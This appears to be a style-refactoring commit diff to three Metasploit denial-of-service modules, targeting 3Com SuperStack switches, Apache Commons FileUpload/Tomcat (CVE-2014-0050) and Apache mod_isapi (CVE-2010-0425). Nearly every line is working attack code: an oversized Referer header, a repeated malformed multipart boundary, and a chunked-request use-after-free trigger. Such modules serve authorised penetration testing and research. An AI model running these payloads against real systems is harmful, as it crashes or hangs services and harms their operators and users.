kernelsmith
diff --git a/‎modules/auxiliary/dos/http/3com_superstack_switch.rb‎
Lines changed: 35 additions & 30 deletions b/‎modules/auxiliary/dos/http/3com_superstack_switch.rb‎
Lines changed: 35 additions & 30 deletions
diff --git a/‎modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb‎
Lines changed: 44 additions & 38 deletions b/‎modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb‎
Lines changed: 44 additions & 38 deletions
diff --git a/‎modules/auxiliary/dos/http/apache_mod_isapi.rb‎
Lines changed: 52 additions & 47 deletions b/‎modules/auxiliary/dos/http/apache_mod_isapi.rb‎
Lines changed: 52 additions & 47 deletions
@@ -8,46 +8,51 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => '3Com SuperStack Switch Denial of Service',
-      'Description'    => %q{
-        This module causes a temporary denial of service condition
-        against 3Com SuperStack switches. By sending excessive data
-        to the HTTP Management interface, the switch stops responding
-        temporarily. The device does not reset. Tested successfully
-        against a 3300SM firmware v2.66. Reported to affect versions
-        prior to v2.72.
-      },
-      'Author'         => [ 'aushack' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => '3Com SuperStack Switch Denial of Service',
+        'Description' => %q{
+          This module causes a temporary denial of service condition
+          against 3Com SuperStack switches. By sending excessive data
+          to the HTTP Management interface, the switch stops responding
+          temporarily. The device does not reset. Tested successfully
+          against a 3300SM firmware v2.66. Reported to affect versions
+          prior to v2.72.
+        },
+        'Author' => [ 'aushack' ],
+        'License' => MSF_LICENSE,
+        'References' => [
           # aushack - I am not sure if these are correct, but the closest match!
           [ 'OSVDB', '7246' ],
           [ 'CVE', '2004-2691' ],
           [ 'URL', 'http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf' ],
         ],
-      'DisclosureDate' => '2004-06-24'))
+        'DisclosureDate' => '2004-06-24',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
-    register_options( [ Opt::RPORT(80) ])
+    register_options([ Opt::RPORT(80) ])
   end
 
   def run
-    begin
-      connect
-      print_status("Sending DoS packet to #{rhost}:#{rport}")
+    connect
+    print_status("Sending DoS packet to #{rhost}:#{rport}")
 
-      sploit = "GET / HTTP/1.0\r\n"
-      sploit << "Referer: " + Rex::Text.rand_text_alpha(1) * 128000
-
-      sock.put(sploit +"\r\n\r\n")
-      disconnect
-      print_error("DoS packet unsuccessful")
-    rescue ::Rex::ConnectionRefused
-      print_error("Unable to connect to #{rhost}:#{rport}")
-    rescue ::Errno::ECONNRESET
-      print_good("DoS packet successful. #{rhost} not responding.")
-    end
+    sploit = "GET / HTTP/1.0\r\n"
+    sploit << 'Referer: ' + Rex::Text.rand_text_alpha(1) * 128000
 
+    sock.put(sploit + "\r\n\r\n")
+    disconnect
+    print_error('DoS packet unsuccessful')
+  rescue ::Rex::ConnectionRefused
+    print_error("Unable to connect to #{rhost}:#{rport}")
+  rescue ::Errno::ECONNRESET
+    print_good("DoS packet successful. #{rhost} not responding.")
   end
 end
@@ -8,46 +8,53 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'            => 'Apache Commons FileUpload and Apache Tomcat DoS',
-      'Description'     => %q{
-        This module triggers an infinite loop in Apache Commons FileUpload 1.0
-        through 1.3 via a specially crafted Content-Type header.
-        Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle
-        mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50
-        and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also
-        uses Commons FileUpload as part of the Manager application.
-       },
-       'Author'         =>
-         [
-           'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.
-           'ribeirux' # metasploit module
-         ],
-       'License'        => MSF_LICENSE,
-       'References'     =>
-         [
-           ['CVE', '2014-0050'],
-           ['URL', 'https://tomcat.apache.org/security-8.html'],
-           ['URL', 'https://tomcat.apache.org/security-7.html']
-         ],
-        'DisclosureDate' => '2014-02-06'
-      ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache Commons FileUpload and Apache Tomcat DoS',
+        'Description' => %q{
+          This module triggers an infinite loop in Apache Commons FileUpload 1.0
+          through 1.3 via a specially crafted Content-Type header.
+          Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle
+          mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50
+          and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also
+          uses Commons FileUpload as part of the Manager application.
+        },
+        'Author' => [
+          'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.
+          'ribeirux' # metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2014-0050'],
+          ['URL', 'https://tomcat.apache.org/security-8.html'],
+          ['URL', 'https://tomcat.apache.org/security-7.html']
+        ],
+        'DisclosureDate' => '2014-02-06',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
-      register_options(
-        [
-          Opt::RPORT(8080),
-          OptString.new('TARGETURI', [ true,  "The request URI", '/']),
-          OptInt.new('RLIMIT', [ true,  "Number of requests to send",50])
-        ])
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [ true, 'The request URI', '/']),
+        OptInt.new('RLIMIT', [ true, 'Number of requests to send', 50])
+      ]
+    )
   end
 
   def run
-    boundary = "0"*4092
+    boundary = '0' * 4092
     opts = {
-      'method'         => "POST",
-      'uri'            => normalize_uri(target_uri.to_s),
-      'ctype'          => "multipart/form-data; boundary=#{boundary}",
-      'data'           => "#{boundary}00000",
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.to_s),
+      'ctype' => "multipart/form-data; boundary=#{boundary}",
+      'data' => "#{boundary}00000",
       'headers' => {
         'Accept' => '*/*'
       }
@@ -63,13 +70,12 @@ def run
         r = c.request_cgi(opts)
         c.send_request(r)
         # Don't wait for a response
-      rescue ::Rex::ConnectionError => exception
-        print_error("Unable to connect: '#{exception.message}'")
+      rescue ::Rex::ConnectionError => e
+        print_error("Unable to connect: '#{e.message}'")
         return
       ensure
         disconnect(c) if c
       end
     end
   end
 end
-
 
@@ -8,38 +8,38 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Apache mod_isapi Dangling Pointer',
-      'Description'    => %q{
-        This module triggers a use-after-free vulnerability in the Apache
-        Software Foundation mod_isapi extension for versions 2.2.14 and earlier.
-        In order to reach the vulnerable code, the target server must have an
-        ISAPI module installed and configured.
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache mod_isapi Dangling Pointer',
+        'Description' => %q{
+          This module triggers a use-after-free vulnerability in the Apache
+          Software Foundation mod_isapi extension for versions 2.2.14 and earlier.
+          In order to reach the vulnerable code, the target server must have an
+          ISAPI module installed and configured.
 
-        By making a request that terminates abnormally (either an aborted TCP
-        connection or an unsatisfied chunked request), mod_isapi will unload the
-        ISAPI extension. Later, if another request comes for that ISAPI module,
-        previously obtained pointers will be used resulting in an access
-        violation or potentially arbitrary code execution.
+          By making a request that terminates abnormally (either an aborted TCP
+          connection or an unsatisfied chunked request), mod_isapi will unload the
+          ISAPI extension. Later, if another request comes for that ISAPI module,
+          previously obtained pointers will be used resulting in an access
+          violation or potentially arbitrary code execution.
 
-        Although arbitrary code execution is theoretically possible, a
-        real-world method of invoking this consequence has not been proven. In
-        order to do so, one would need to find a situation where a particular
-        ISAPI module loads at an image base address that can be re-allocated by
-        a remote attacker.
+          Although arbitrary code execution is theoretically possible, a
+          real-world method of invoking this consequence has not been proven. In
+          order to do so, one would need to find a situation where a particular
+          ISAPI module loads at an image base address that can be re-allocated by
+          a remote attacker.
 
-        Limited success was encountered using two separate ISAPI modules. In
-        this scenario, a second ISAPI module was loaded into the same memory
-        area as the previously unloaded module.
-      },
-      'Author'         =>
-        [
-          'Brett Gervasoni',  # original discovery
+          Limited success was encountered using two separate ISAPI modules. In
+          this scenario, a second ISAPI module was loaded into the same memory
+          area as the previously unloaded module.
+        },
+        'Author' => [
+          'Brett Gervasoni', # original discovery
           'jduck'
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2010-0425' ],
           [ 'OSVDB', '62674'],
           [ 'BID', '38494' ],
@@ -48,7 +48,14 @@ def initialize(info = {})
           [ 'URL', 'http://www.senseofsecurity.com.au/advisories/SOS-10-002' ],
           [ 'EDB', '11650' ]
         ],
-      'DisclosureDate' => '2010-03-05'))
+        'DisclosureDate' => '2010-03-05',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options([
       Opt::RPORT(80),
@@ -57,37 +64,35 @@ def initialize(info = {})
   end
 
   def run
-
-    serverIP = datastore['RHOST']
+    server_ip = datastore['RHOST']
     if (datastore['RPORT'].to_i != 80)
-      serverIP += ":" + datastore['RPORT'].to_s
+      server_ip += ':' + datastore['RPORT'].to_s
     end
-    isapiURI = datastore['ISAPI']
+    isapi_uri = datastore['ISAPI']
 
     # Create a stale pointer using the vulnerability
-    print_status("Causing the ISAPI dll to be loaded and unloaded...")
-    unload_trigger = "POST " + isapiURI + " HTTP/1.0\r\n" +
-      "Pragma: no-cache\r\n" +
-      "Proxy-Connection: Keep-Alive\r\n" +
-      "Host: " + serverIP + "\r\n" +
-      "Transfer-Encoding: chunked\r\n" +
-      "Content-Length: 40334\r\n\r\n" +
-      Rex::Text.rand_text_alphanumeric(rand(128)+128)
+    print_status('Causing the ISAPI dll to be loaded and unloaded...')
+    unload_trigger = 'POST ' + isapi_uri + " HTTP/1.0\r\n" \
+                     "Pragma: no-cache\r\n" \
+                     "Proxy-Connection: Keep-Alive\r\n" \
+                     'Host: ' + server_ip + "\r\n" \
+                     "Transfer-Encoding: chunked\r\n" \
+                     "Content-Length: 40334\r\n\r\n" +
+                     Rex::Text.rand_text_alphanumeric(128..255)
     connect
     sock.put(unload_trigger)
     disconnect
 
     # Now make the stale pointer get used...
-    print_status("Triggering the crash ...")
-    data = Rex::Text.rand_text_alphanumeric(rand(256)+1337)
-    crash_trigger = "POST " + isapiURI + " HTTP/1.0\r\n" +
-      "Host: " + serverIP + "\r\n" +
-      "Content-Length: #{data.length}\r\n\r\n" +
-      data
+    print_status('Triggering the crash ...')
+    data = Rex::Text.rand_text_alphanumeric(1337..1592)
+    crash_trigger = 'POST ' + isapi_uri + " HTTP/1.0\r\n" \
+                    'Host: ' + server_ip + "\r\n" \
+                    "Content-Length: #{data.length}\r\n\r\n" +
+                    data
 
     connect
     sock.put(crash_trigger)
     disconnect
-
   end
 end